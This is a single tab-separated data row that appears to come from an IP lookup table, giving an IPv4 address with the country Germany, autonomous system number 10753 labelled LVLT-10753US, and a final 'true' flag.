178.215.236.218	unknown	Germany		10753	LVLT-10753US	true